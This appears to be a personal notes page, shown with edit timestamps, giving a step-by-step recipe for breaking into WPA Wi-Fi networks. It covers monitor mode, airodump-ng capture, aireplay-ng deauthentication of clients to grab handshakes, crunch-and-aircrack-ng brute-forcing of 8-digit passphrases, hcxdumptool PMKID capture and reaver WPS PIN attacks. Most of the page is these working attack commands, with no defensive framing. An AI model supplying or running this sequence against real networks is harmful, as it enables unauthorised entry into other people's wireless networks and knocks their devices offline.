2020-10-27 06:39:08 +00:00
|
|
|
# Monitor mode
|
|
|
|
For my RTL8188EUS:
|
|
|
|
|
|
|
|
```
|
|
|
|
ip link set wlanX down
|
|
|
|
iw dev wlanX set type monitor
|
|
|
|
```
|
|
|
|
|
|
|
|
# Scan networks
|
|
|
|
|
|
|
|
All channels:
|
|
|
|
```
|
|
|
|
airodump-ng wlanX
|
|
|
|
```
|
|
|
|
Specific channel:
|
|
|
|
```
|
|
|
|
airodump-ng -c 6 wlanX
|
|
|
|
```
|
|
|
|
|
|
|
|
# Save a capture of chosen BSSID
|
|
|
|
|
|
|
|
```
|
|
|
|
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
|
|
|
|
```
|
|
|
|
|
|
|
|
You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
|
|
|
|
```
|
|
|
|
aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
|
|
|
|
```
|
|
|
|
`-a` is access point
|
|
|
|
`-c` is client
|
|
|
|
|
|
|
|
Then you should have an EAPOL/WPA handshake.
|
|
|
|
|
|
|
|
# Crack WPA passphrase
|
|
|
|
|
|
|
|
## For a 8 digits scheme
|
|
|
|
|
2020-10-27 06:39:46 +00:00
|
|
|
```
|
2020-10-27 06:39:08 +00:00
|
|
|
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
|
2020-10-27 07:09:00 +00:00
|
|
|
```
|
|
|
|
|
|
|
|
# Wireshark
|
|
|
|
|
2020-10-27 11:53:19 +00:00
|
|
|
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
|
|
|
|
|
|
|
|
## PMKID method
|
|
|
|
|
|
|
|
```
|
|
|
|
hcxdumptool -i wlanX -o PMKID --enable_status=1
|
|
|
|
```
|
|
|
|
|
|
|
|
TODO...
|
|
|
|
|
|
|
|
## WPS method
|
|
|
|
|
|
|
|
AP must have WPS enabled with a PIN. Not PBC, push button.
|
|
|
|
|
|
|
|
```
|
|
|
|
reaver -i wlanX -b 00:23:B1:82:84:xx
|
2020-10-27 23:48:30 +00:00
|
|
|
```
|
|
|
|
|
|
|
|
## Resources
|
|
|
|
|
|
|
|
<https://github.com/ZerBea/hcxdumptool>
|
|
|
|
<https://github.com/ZerBea/hcxtools>
|
|
|
|
<https://wpa-sec.stanev.org/>
|